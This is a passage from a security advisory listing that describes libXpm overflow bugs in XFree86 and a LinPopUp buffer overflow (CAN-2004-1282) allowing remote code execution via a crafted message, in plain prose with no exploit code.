| Created: | September 16, 2004 |
Updated: | February 14, 2005 |
| Description: |
There are several stack and integer overflow bugs in
the libXpm code of XFree86 that may be used for a denial of service. |
| Alerts: |
|
Comments (none posted)
LinPopUp: buffer overflow in message reply
| Package(s): | linpopup |
CVE #(s): | CAN-2004-1282
|
| Created: | January 4, 2005 |
Updated: | January 10, 2005 |
| Description: |
Stephen Dranger discovered that LinPopUp contains a buffer overflow in
string.c, triggered when replying to a remote user message. A remote
attacker could craft a malicious message that, when replied to using
LinPopUp, would exploit the buffer overflow. This would result in the
execution of arbitrary code with the privileges of the user running
LinPopUp. |
| Alerts: |
|
